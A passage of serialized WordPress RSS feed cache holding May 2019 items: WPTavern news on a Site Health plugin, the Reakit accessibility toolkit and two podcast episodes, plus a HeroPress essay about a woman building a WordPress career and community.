+0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:23;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:107:"WPTavern: Site Health Tool Manager Provides A Convenient Way to Disable Unnecessary Site Health Check Tests";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=89529";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:118:"https://wptavern.com/site-health-tool-manager-provides-a-convenient-way-to-disable-unnecessary-site-health-check-tests";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:1939:"<p>WordPress 5.2, <a href="https://wptavern.com/wordpress-5-2-jaco-released-includes-fatal-php-error-protection-and-a-recovery-mode">released last week</a>, added two new pages to the WordPress backend to help users diagnose common configuration issues. The Site Health Check page runs a series of tests and categorizes the results as critical, recommended, and good. This helps users prioritize which issues require immediate attention.</p>\n\n\n\n<p>WordPress 5.2 <a href="https://make.wordpress.org/core/2019/04/25/site-health-check-in-5-2/">adds filters </a>for developers to add, edit, or remove tests but these filters may not be as accessible as a plugin. <a href="https://wordpress.org/plugins/site-health-tool-manager/">Site Health Tool Manager</a> by <a href="https://wearnhardt.com/">William Earnhardt</a> is a new plugin that provides an easy way to disable tests. </p>\n\n\n\n<div class="wp-block-image"><img />Site Health Tool Manager Settings</div>\n\n\n\n<p>In some situations, consultants may want to disable certain tests to prevent the results from panicking a client. For example, if a consultant has configured a site to not receive automatic updates because the site is managed with version control, the site health check test is unnecessary.</p>\n\n\n\n<p>Disabling unnecessary tests can also increase a Site&#8217;s Health Percentage score. However, in the plugin&#8217;s description, Earnhardt stresses that the plugin should, &#8220;only be used to disable tests with a legitimate and acceptable reason for failing. <em>It should not be used to hide tests which can be fixed.</em>&#8220;</p>\n\n\n\n<p>Site Health Manager also supports the tests that <a href="https://jetpack.com/2019/05/07/jetpack-7-3start-strong-and-stay-healthy/">were recently added</a> in Jetpack 7.3. Site Health Tool Manager is free and can be found on the <a href="https://wordpress.org/plugins/site-health-tool-manager/">WordPress plugin directory</a>. </p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 16 May 2019 02:33:16 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Jeff Chandler";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:24;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:39:"WPTavern: Pressing Topics – Episode 2";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=89714";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:46:"https://wptavern.com/pressing-topics-episode-2";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:2517:"<p>Pressing Topics is a daily podcast hosted by <a href="https://www.presstitan.com/">Malcolm Peralty</a> and myself. We discuss the news that’s making headlines in the WordPress ecosystem as well as related topics that catch our eyes. Generally speaking, if you listen to this show on a daily basis, you should have a good idea on what’s going on in the WordPress community.</p>\n\n\n\n<p>In this episode, Malcolm and I review the most common mistakes WordPress theme developers make based on a veteran theme reviewer&#8217;s experience, the 10 best countries to outsource software development too, and a new proposal to the Plugin Directory Guidelines.</p>\n\n\n\n<p>Due to a software issue, the volume of my voice in the beginning of the show varies from loud to quiet to loud again. The audio normalizes after about 5-10 minutes. I&#8217;ve made some software changes and am hopeful the audio quality in episode three is much better. </p>\n\n\n\n<h2>Stories Discussed:</h2>\n\n\n\n<p><a href="https://wptavern.com/the-most-common-wordpress-theme-development-mistakes-and-how-to-fix-them">The Most Common WordPress Theme Development Mistakes (and How to Fix Them)</a></p>\n\n\n\n<p><a href="https://www.codeinwp.com/blog/best-countries-to-outsource-software-development/">10 Best Countries to Outsource Software Development, Based on Data</a></p>\n\n\n\n<p><a href="https://torquemag.io/2019/05/wordpress-ecommerce-site/">4 Reasons You Should Choose WordPress for Your E-Commerce Site</a></p>\n\n\n\n<p><a href="https://jetpack.com/2019/05/14/jetpack-7-3-1-maintenance-release/">Jetpack 7.3.1: Maintenance Release</a></p>\n\n\n\n<p><a href="https://make.wordpress.org/plugins/2019/05/14/proposal-to-modify-plugin-guidelines/">Proposal to Modify Plugin Guidelines</a></p>\n\n\n\n<p>The transcript is in Rich-Text format. You can download the show or listen to it via the embedded audio player below. </p>\n\n\n\n<div class="wp-block-file"><a href="https://wptavern.com/wp-content/uploads/2019/05/Pressing-Topics-Episode-2-Transcript.rtf">Pressing Topics Episode 2 Transcript</a><a href="https://wptavern.com/wp-content/uploads/2019/05/Pressing-Topics-Episode-2-Transcript.rtf" class="wp-block-file__button">Download</a></div>\n\n\n\n<div class="wp-block-file"><a href="https://wptavern.com/wp-content/uploads/2019/05/EPISODE-2-Pressing-Topics.mp3">Pressing Topics Episode 2</a><a href="https://wptavern.com/wp-content/uploads/2019/05/EPISODE-2-Pressing-Topics.mp3" class="wp-block-file__button">Download</a></div>\n\n\n\nListen to Episode 2 of Pressing Topics";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Wed, 15 May 2019 19:37:48 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Jeff Chandler";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:25;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:96:"WPTavern: Reakit Version 1.0 Released: A New Toolkit for Building Accessible Web Apps with React";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=89682";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:106:"https://wptavern.com/reakit-version-1-0-released-a-new-toolkit-for-building-accessible-web-apps-with-react";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:6887:"<p><a href="https://reakit.io/" rel="noopener noreferrer" target="_blank">Reakit</a> is a new toolkit for building accessible web apps with React. Brazilian developer Diego Haz launched his MIT-licensed open source project this week with a stable version 1.0 now available to the public.</p>\n<p>The toolkit offers offers composable, themeable, and accessible UI components that strictly follow <a href="https://www.w3.org/TR/wai-aria/" rel="noopener noreferrer" target="_blank">WAI-ARIA 1.1</a> standards. Out of the box, Reakit manages focus and keyboard interactions for components that require them. </p>\n<p>&#8220;WAI-ARIA is hard,&#8221; Haz said. &#8220;Mostly because the spec is dense, confusing and incomplete. My goal with Reakit is not only to provide accessible components out of the box, but also to serve as an example so people can build their own accessible stuff from scratch.&#8221;</p>\n<blockquote class="twitter-tweet">\n<p lang="en" dir="ltr">A year ago I left my job to dedicate myself to this open source project.</p>\n<p><img src="https://s.w.org/images/core/emoji/12.0.0-1/72x72/1f389.png" alt="🎉" class="wp-smiley" /> Announcing Reakit v1 <img src="https://s.w.org/images/core/emoji/12.0.0-1/72x72/1f389.png" alt="🎉" class="wp-smiley" /><br /><img src="https://s.w.org/images/core/emoji/12.0.0-1/72x72/1f449.png" alt="👉" class="wp-smiley" /> <a href="https://t.co/GbaNYa5rck">https://t.co/GbaNYa5rck</a></p>\n<p>This is the best project I’ve ever done in my 17 years of programming. I’m sure it''ll help many companies ship accessible web apps with ease. <img src="https://s.w.org/images/core/emoji/12.0.0-1/72x72/267f.png" alt="♿" class="wp-smiley" /> <a href="https://t.co/s1Xd9XVa48">pic.twitter.com/s1Xd9XVa48</a></p>\n<p>&mdash; Haz (@diegohaz) <a href="https://twitter.com/diegohaz/status/1128314741267550208?ref_src=twsrc%5Etfw">May 14, 2019</a></p></blockquote>\n<p></p>\n<p>Last year Haz <a href="https://github.com/reakit/reakit/issues/154" rel="noopener noreferrer" target="_blank">removed all the unnecessary styles</a> from the core package, in favor of having separate packages for themes. The core library is now unstyled by default and does not depend a CSS library. This makes it easier for developers to build UIs from scratch. Developers with specific presentational requirements can easily apply their own styles, instead of spending time having to overwrite a built-in set of styles.</p>\n<p>Those who don&#8217;t want to start from scratch can install a theme package like <a href="https://www.npmjs.com/package/reakit-theme-default" rel="noopener noreferrer" target="_blank">reakit-theme-default</a>. As the community around Reakit grows, more themes will may become available as packages.</p>\n<p><a href="https://github.com/reakit/reakit" rel="noopener noreferrer" target="_blank">Reakit&#8217;s GitHub repository</a> has been starred more than 2,100 times and 34 people have contributed to the project. Developers who discovered Reakit in its earlier days of development are already building apps and libraries that use the toolkit.</p>\n<blockquote class="twitter-tweet">\n<p lang="en" dir="ltr">Hooks, <a href="https://twitter.com/reakitjs?ref_src=twsrc%5Etfw">@reakitjs</a>, <a href="https://twitter.com/gatsbyjs?ref_src=twsrc%5Etfw">@gatsbyjs</a>, and <a href="https://twitter.com/popmotionjs?ref_src=twsrc%5Etfw">@popmotionjs</a>''s Posed are making this ridiculously easy.</p>\n<p>Time to add a GraphQL backend, then some auth with Auth0. <a href="https://t.co/vhrCcp0nIA">pic.twitter.com/vhrCcp0nIA</a></p>\n<p>&mdash; Swizec Teller (@Swizec) <a href="https://twitter.com/Swizec/status/1110968312920301568?ref_src=twsrc%5Etfw">March 27, 2019</a></p></blockquote>\n<p></p>\n<blockquote class="twitter-tweet">\n<p lang="en" dir="ltr">Been keeping this quiet for a while, but over the past few months I''ve been developing a new library. Fannypack is a friendly, themeable, accessible React UI Kit built with <a href="https://twitter.com/reakitjs?ref_src=twsrc%5Etfw">@reakitjs</a>. </p>\n<p>Check it out!<a href="https://t.co/1g5YjTeHN5">https://t.co/1g5YjTeHN5</a></p>\n<p>&mdash; Jake Moxey (@jxom_) <a href="https://twitter.com/jxom_/status/1075368019835011073?ref_src=twsrc%5Etfw">December 19, 2018</a></p></blockquote>\n<p></p>\n<p>One year ago, Haz left his job to work on Reakit full time as an open source project, because accessibility wasn&#8217;t a major priority at the company that employed him.</p>\n<p>&#8220;I started building Reakit in my spare time with the purpose of easing my team&#8217;s work as we were building most of our components from scratch,&#8221; Haz said. &#8220;The company not only denied that idea (which may be reasonable), but also asked me to delete the project.</p>\n<p>&#8220;So I realized that I was in the wrong company and quit. Since I had savings, I decided to focus on this project. But soon enough I&#8217;ll have to find another job. I&#8217;ll try to find companies where I can use Reakit so I can improve the library at the same time I&#8217;m building something with it.&#8221;</p>\n<p>Not all companies prioritize accessibility in their React-based products. One reason is the expertise and passion for accessibility, paired with React skills, is hard to find.</p>\n<p>As <a href="https://wptavern.com/wpcampus-gutenberg-accessibility-audit-finds-significant-and-pervasive-accessibility-problems" rel="noopener noreferrer" target="_blank">WPCampus&#8217; Gutenberg accessibility audit</a> demonstrated, making accessible web apps with React is challenging. Gutenberg is <a href="https://make.wordpress.org/core/2019/05/15/whats-new-in-gutenberg-15th-may/" rel="noopener noreferrer" target="_blank">making major improvements towards becoming more accessible</a> after the completion of the audit. This process has shown that leveraging accessibility expertise and baking it in from the beginning is crucial for writing accessible web apps. </p>\n<p>React is often, and perhaps unfairly, singled out as <a href="https://www.netlify.com/blog/2019/02/25/accessibility-is-not-a-react-problem/" rel="noopener noreferrer" target="_blank">having an accessibility problem</a>. The library isn&#8217;t known for making it easy, but it does provide <a href="https://reactjs.org/docs/accessibility.html" rel="noopener noreferrer" target="_blank">accessibility documentation</a> and encourages developers to write semantic HTML. </p>\n<p>While there is no magical &#8220;do-it-for-me&#8221; library that can ensure an app&#8217;s accessibility, the Reakit toolkit gives developers a head start. The project is <a href="https://github.com/reakit/reakit" rel="noopener noreferrer" target="_blank">open to contribution on GitHub</a> and is also on Open Collective for those interested in <a href="https://opencollective.com/reakit" rel="noopener noreferrer" target="_blank">funding its development</a>.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Wed, 15 May 2019 19:02:23 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:26;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:27:"HeroPress: I Found My Tribe";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:56:"https://heropress.com/?post_type=heropress-essays&p=2814";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:106:"https://heropress.com/essays/i-found-my-tribe/#utm_source=rss&utm_medium=rss&utm_campaign=i-found-my-tribe";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:11646:"<img width="960" height="480" src="https://s20094.pcdn.co/wp-content/uploads/2020/05/051519-min-1024x512.jpg" class="attachment-large size-large wp-post-image" alt="Pull Quote: I don''t just have WordPress acquaintences. I have WordPress friend. I have WordPress family." /><p>When I was a kid not a single girl said “I want to be a web designer when I grow up”. Mostly because there was no world wide web. There weren’t video games either, until I was in junior high school and Pong came out. Back when I was a kid, girls mostly thought about becoming teachers, nurses, ballerinas, and mothers. We weren’t encouraged to do “man” jobs. We definitely weren’t encouraged to pursue STEM careers.</p>\n<p>As a matter of fact, my high school guidance counselor told me that I should give up my dream of college and concentrate on being a stay-at-home mom. (It was 1987 and I was ranked 21/325 students in my graduating class.)</p>\n<p>I’ve always been a bit of a calculated rebel, so I didn’t heed her advice. Instead I started down a long path through academia that would eventually bring me here, to WordPress and the community that has become my tribe.</p>\n<p>I&#8217;m often asked how I started my WordPress business. I would love to tell you a story about how I did a ton of research, met with mentors, found advisors, wrote a perfect business plan, crafted an amazing marketing plan, and launched according to a timeline all neatly written out (and using a project management app, of course).</p>\n<h3>It wasn&#8217;t like that at all.</h3>\n<p>At the time I started my business I had worked in higher education for over twenty years as an administrator in five different colleges, universities, and trade schools. I had a bachelor of arts degree in Religion and Philosophy, classical training in vocal performance, an MBA (in marketing, e-commerce, and information systems management), and coursework completed toward a doctorate in higher education administration.</p>\n<p>In June of 2013, I decided it was time to leave my job as an administrator in a local trade school. I hadn&#8217;t really been happy for a long while, and the timing was right financially for me to make a move. My plan was to take July off, use August to job search, then be employed by September.</p>\n<blockquote><p>Have you ever heard the phrase, &#8220;Men plan, God laughs&#8221;?</p></blockquote>\n<p>While it was still June, and within the two weeks’ notice I had given, I was afraid I might become bored. I thought I could make a little money doing some marketing, so I posted to my personal Facebook page that I would love to help out friends and family with social media or web design. The customers came out of the woodwork.</p>\n<h3>And just like that, I had a business.</h3>\n<p>I made many mistakes along the way, of course. I charged $300 for a website when I started ($500 for e-commerce). I paid my dues and learned the trade. I started attending WordPress meetups in Rochester. They were sporadic, at best, so when the organizer asked me if I would become the organizer, I jumped at the chance and got us on a regular schedule, with topics in advance and volunteer speakers.</p>\n<p>From there it was just a matter of time before I would attend my first WordCamp (Buffalo, 2014). Since then I’ve attended more than thirty camps, organized six, mentored five, and spoken at twenty.</p>\n<h3>I love WordPress. But I love the people even more.</h3>\n<p>I don’t just <em>love</em> WordPress. I <em>fell in love</em> with WordPress. The ease of use. The total control. I love that there’s always more to learn. I love that I can teach others how to use it. I love the events. I love the collaboration. I love the people.</p>\n<p>I don’t just have WordPress acquaintances. I have WordPress friends. I have a WordPress <em>family</em>.</p>\n<p>The first site I ever logged into was created for my best friend and me. We had just started a nonprofit organization and her husband built us a website. He made the structure, but we had to add the content. He emailed us our logins. I remember logging in like I had mistakenly been given the key to the castle and wasn’t really supposed to use it. I was afraid to click links. I was afraid to click “publish” or “update.”</p>\n<blockquote><p>I thought for sure I’d kill the whole site. But I didn’t.</p></blockquote>\n<p>I wrote. I added classes. I added pages. I added posts. We added a membership component and soon I was navigating that like a sailor in well-known waters. I was a great WordPress user, but I still didn’t understand the connection between purchasing a domain and having a WordPress site, so I called my friend’s husband.</p>\n<p>Rob and Christine had five kids and Christine worked evenings. When I asked Rob to teach me how to get from the domain purchase to having a site, a deal was struck: if I would cook dinner for their kids, he would teach me WordPress. I made spaghetti, purchased a domain and hosting, and I wrote 4 things down on a piece of paper:</p>\n<ol>\n<li>Download WordPress from wordpress.org.</li>\n<li>Upload WordPress through FTP.</li>\n<li>Edit wp-config file (don’t forget to change the salt keys)</li>\n<li>Don’t use “admin” as the account name.</li>\n</ol>\n<p>The rest I (miraculously) remembered. That was eight years and over 300 WordPress installations ago.</p>\n<h3>Which all led me to where I am now.</h3>\n<p>Getting up the courage to speak at WordCamp about a year after I started building sites was scary. I felt like an imposter. I was sure I would be “found out,” but I really did “know my stuff.” People were very complimentary about my talk, so I applied to more camps. I met more people. My friends teased me that I wanted to know all the “A-Listers” in WordPress. Others teased that I wanted to BE an A-Lister. What I really wanted was to learn as much as I could, share what I knew, and build a network.</p>\n<p>In 2017 I spoke at WordCamp Ottawa. It was there I built a connection with Jason Knill of GiveWP.com. I had used Give before, and I told him about how it worked for me. He asked if Give could write about the nonprofit site I had built to raise money to feed children in South Sudan. He interviewed me about it. At the end of our meeting I mentioned to Jason that “if you ever have an opening, I’d love to work for you.” Four and a half months later I started working full-time as the Head of Customer Success for Give.</p>\n<h3>What I love about my job.</h3>\n<p>In my role at Give I get to talk to people all over the world. I get to help them increase their fundraising, which in turn helps their organizations &#8211; most of which are nonprofits helping make the world a better place.</p>\n<p>With our WP Business Reviews plugin I get to work with businesses that are hoping to grow and succeed &#8211; just like I did when I started my freelance business.</p>\n<p>I get to build a team that helps us succeed by helping others succeed. I get to employ people locally in my small hometown outside of Rochester, NY.</p>\n<blockquote><p>I get to keep sharing my love of WordPress.</p></blockquote>\n<p>I continue to speak at WordCamps, mentor and teach locally, and organize my local WordPress Meetup and Technology Nonprofit Meetup. I love Slack, Facebook Groups, Facebook Messenger, and Twitter messages because they let me keep in touch with all of the wonderful people I meet in the community.</p>\n<h3>Mostly I love how WordPress has empowered me to do more and to be more.</h3>\n<p>I’ve spent most of my life trying to broaden my comfort zone.</p>\n<p>As you can probably tell, I have a pretty large comfort zone. Actually, I can’t remember the last time I saw the border of my comfort zone, because it’s that big; but it wasn’t always so. When I was a child I had a comfort zone the size of a postage stamp. I had to stand in it on one toe, like an uncoordinated ballerina trying to learn to go en pointe and failing miserably. I was timid and shy. I was afraid of everything.</p>\n<p>Then one day I decided to do something uncomfortable. I ran for 8th grade student council secretary. It didn’t occur to me that I might not win. I have no idea where that hubris came from. I figured, at that point, that I had just as good a chance as anybody else. I made posters. I gave a speech. And something amazing happened. <em><strong>I lost the election.</strong></em> I mean, I cataclysmically lost the election.</p>\n<p>Most people wouldn’t think that losing an election was amazing, but it was. It was amazing because I learned that I could step outside of my comfort zone, lose, and survive. I could still breathe. Still be me. It had changed me and my perceptions of myself. After that, instead of a postage stamp-sized comfort zone, I could put my foot down on the whole envelope.</p>\n<h3>It didn’t end there.</h3>\n<p>What I learned is that comfort zones are like concentric circles. A step outside doesn’t just stretch the zone to fit that footstep. Instead, it increases it exponentially. Where before you had a three-foot circle, now you have a six-foot circle, then twelve feet, then twenty-four feet, then before you know it, you won’t be able to see the edge of your zone because it’s so big.</p>\n<h3>WordPress helped me with that, too.</h3>\n<p>Instead of feeling like an imposter, the WordPress community embraced me and gave me the validation I needed to feel like I belonged. People were receptive to my ideas. Some wanted to teach me. Some wanted to learn from me. Some wanted to work with me. People hired me. Others asked my opinion or for help. I belonged. <em>I had a tribe.</em></p>\n<p>I will continue to contribute to, support, learn from and grow with WordPress. I love it here. I love my tribe.</p>\n<h3>I hope you find your tribe, too.</h3>\n<div class="rtsocial-container rtsocial-container-align-right rtsocial-horizontal"><div class="rtsocial-twitter-horizontal"><div class="rtsocial-twitter-horizontal-button"><a title="Tweet: I Found My Tribe" class="rtsocial-twitter-button" href="https://twitter.com/share?text=I%20Found%20My%20Tribe&via=heropress&url=https%3A%2F%2Fheropress.com%2Fessays%2Fi-found-my-tribe%2F" rel="nofollow" target="_blank"></a></div></div><div class="rtsocial-fb-horizontal fb-light"><div class="rtsocial-fb-horizontal-button"><a title="Like: I Found My Tribe" class="rtsocial-fb-button rtsocial-fb-like-light" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fheropress.com%2Fessays%2Fi-found-my-tribe%2F" rel="nofollow" target="_blank"></a></div></div><div class="rtsocial-linkedin-horizontal"><div class="rtsocial-linkedin-horizontal-button"><a class="rtsocial-linkedin-button" href="https://www.linkedin.com/shareArticle?mini=true&url=https%3A%2F%2Fheropress.com%2Fessays%2Fi-found-my-tribe%2F&title=I+Found+My+Tribe" rel="nofollow" target="_blank" title="Share: I Found My Tribe"></a></div></div><div class="rtsocial-pinterest-horizontal"><div class="rtsocial-pinterest-horizontal-button"><a class="rtsocial-pinterest-button" href="https://pinterest.com/pin/create/button/?url=https://heropress.com/essays/i-found-my-tribe/&media=https://heropress.com/wp-content/uploads/2020/05/051519-min-150x150.jpg&description=I Found My Tribe" rel="nofollow" target="_blank" title="Pin: I Found My Tribe"></a></div></div><a rel="nofollow" class="perma-link" href="https://heropress.com/essays/i-found-my-tribe/" title="I Found My Tribe"></a></div><p>The post <a rel="nofollow" href="https://heropress.com/essays/i-found-my-tribe/">I Found My Tribe</a> appeared first on <a rel="nofollow" href="https://heropress.com">HeroPress</a>.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Wed, 15 May 2019 12:00:09 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Michelle Ames";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:27;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:71:"WPTavern: WPWeekly Episode 352 – Capital P Dangit and My Future Plans";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:59:"https://wptavern.com/?p=89665&preview=true&preview_id=89665";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:78:"https://wptavern.com/wpweekly-episode-352-capital-p-dangit-and-my-future-plans";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:2605:"<p><strong>*Update*</strong> The previous mp3 attached to this post inadvertently ended around the 31 minute mark. I&#8217;ve reuploaded the episode and corrected the problem. The full episode is attached below.</p>\n<p>In this episode, <a href="http://jjj.me">John James Jacoby</a> and I share what&#8217;s new in WordPress 5.2, discuss why not capitalizing one letter can make or break someone in the WordPress community, and what&#8217;s new in Jetpack 7.3. We also highlight the highly anticipated release of Advanced Custom Fields 5.8.0.</p>\n<p>Near the end of the show, I describe what I&#8217;ve been going through the last few months and what you can expect from me going forward. In short, a variety of audio content.</p>\n<h2>Stories Discussed:</h2>\n<p><a href="https://wptavern.com/wordpress-5-2-jaco-released-includes-fatal-php-error-protection-and-a-recovery-mode">WordPress 5.2 “Jaco” Released, Includes Fatal PHP Error Protection and A Recovery Mode</a></p>\n<p><a href="https://wptavern.com/registration-for-wordsesh-6-is-now-open">Registration for WordSesh 6 Is Now Open</a></p>\n<p><a href="https://wptavern.com/new-membership-block-coming-to-jetpack-site-health-and-debug-info-added-to-version-7-3">New Membership Block Coming to Jetpack, Site Health and Debug Info Added to Version 7.3</a></p>\n<p><a href="https://wptavern.com/advanced-custom-fields-5-8-0-introduces-acf-blocks-a-php-framework-for-creating-gutenberg-blocks">Advanced Custom Fields 5.8.0 Introduces ACF Blocks: A PHP Framework for Creating Gutenberg Blocks</a></p>\n<p><a href="https://wptavern.com/wptracsearch-an-elasticsearch-powered-search-interface-for-wordpress-trac-tickets">WPTracSearch: An Elasticsearch-Powered Search Interface for WordPress Trac Tickets</a></p>\n<h2>Transcript:</h2>\n<p><a href="https://wptavern.com/wp-content/uploads/2019/05/Transcript-of-EPISODE-352-WordPress-Weekly.rtf">Transcript of EPISODE 352 &#8211; WordPress Weekly</a></p>\n<h2>WPWeekly Meta:</h2>\n<p><strong>Next Episode:</strong> Wednesday, May 22nd 3:00 P.M. Eastern</p>\n<p>Subscribe to <a href="https://itunes.apple.com/us/podcast/wordpress-weekly/id694849738">WordPress Weekly via Itunes</a></p>\n<p>Subscribe to <a href="https://www.wptavern.com/feed/podcast">WordPress Weekly via RSS</a></p>\n<p>Subscribe to <a href="http://www.stitcher.com/podcast/wordpress-weekly-podcast?refid=stpr">WordPress Weekly via Stitcher Radio</a></p>\n<p>Subscribe to <a href="https://play.google.com/music/listen?u=0#/ps/Ir3keivkvwwh24xy7qiymurwpbe">WordPress Weekly via Google Play</a></p>\n<p><strong>Listen To Episode #352:</strong><br />\n</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Tue, 14 May 2019 21:47:31 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Jeff 